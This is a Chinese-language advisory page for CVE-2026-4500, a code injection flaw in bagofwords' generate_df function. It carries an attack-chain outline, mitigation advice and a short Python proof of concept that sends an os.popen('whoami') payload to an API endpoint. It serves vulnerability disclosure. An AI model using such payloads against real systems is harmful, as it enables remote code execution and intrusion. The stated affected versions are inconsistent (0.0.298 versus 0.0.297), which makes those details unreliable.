CVE-2026-4500 CVSS 6.3 中危

CVE-2026-4500 bagofwords代码注入漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4500

漏洞类型

代码注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

bagofwords

漏洞概述

bagofwords是一个基于Python的应用程序。在其0.0.298及之前的版本中，backend/app/ai/code_execution/code_execution.py文件的generate_df函数存在严重的安全缺陷。由于对用户输入处理不当，导致代码注入漏洞。攻击者可利用该漏洞发起远程攻击，执行任意代码，进而影响系统的机密性、完整性和可用性。目前厂商已发布修复版本，建议用户尽快升级。

技术细节

该漏洞的核心在于bagofwords应用的代码执行模块未能有效隔离用户输入。在backend/app/ai/code_execution/code_execution.py文件的generate_df函数中，程序接收外部数据并将其直接传递给执行上下文，未经过严格的类型检查或安全过滤。攻击者可以构造包含恶意Python语法的Payload，通过API接口发送至服务器。由于CVSS评分显示攻击无需用户交互且仅需低权限账户，一旦请求到达服务器端，恶意代码将在应用程序的上下文中被执行。这种代码注入漏洞允许攻击者读取敏感文件、安装后门程序或破坏系统服务，危害程度较高。

攻击链分析

STEP 1

侦察

攻击者识别出目标使用的是存在漏洞的bagofwords版本（<= 0.0.297）。

STEP 2

获取权限

攻击者获取目标系统的低权限账户凭证（PR:L要求）。

STEP 3

漏洞利用

攻击者向backend/app/ai/code_execution/code_execution.py的generate_df接口发送包含恶意Python代码的特制请求。

STEP 4

代码执行

服务器端未能过滤输入，执行了攻击者注入的代码，实现了远程代码执行（RCE）。

STEP 5

维持影响

攻击者利用获得的Shell权限进行数据窃取、篡改或进一步横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-4500: Code Injection in bagofwords
# Target the generate_df function

target = 'http://vulnerable-host:port/api/ai/code_execution'
# Malicious payload to execute 'whoami' command
payload = {
    'code': "__import__('os').popen('whoami').read()"
}

try:
    r = requests.post(target, json=payload)
    if r.status_code == 200:
        print("Exploit successful! Response:")
        print(r.text)
    else:
        print(f"Failed, status code: {r.status_code}")
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

bagofwords <= 0.0.297

防御指南

临时缓解措施

若暂时无法升级，建议禁用受影响的generate_df功能或相关代码执行接口。同时，应在Web应用防火墙（WAF）中添加规则，拦截包含常见Python危险函数（如eval, exec, os.system）的请求流量，以降低被攻击的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4500
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4500
3 Details https://www.cvedetails.com/cve/CVE-2026-4500/
4 VulDB https://vuldb.com/cve/CVE-2026-4500
5 Link https://github.com/Ka7arotto/cve/blob/main/bagofwords-rce.md
6 Link https://github.com/bagofwords1/bagofwords/
7 Link https://github.com/bagofwords1/bagofwords/commit/47b20bcda31264635faff7f6b1c8095abe1861c6
8 Link https://github.com/bagofwords1/bagofwords/issues/60
9 Link https://github.com/bagofwords1/bagofwords/pull/63
10 Link https://github.com/bagofwords1/bagofwords/releases/tag/v0.0.298
11 Link https://vuldb.com/?ctiid.352065
12 Link https://vuldb.com/?id.352065
13 Link https://vuldb.com/?submit.773890

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表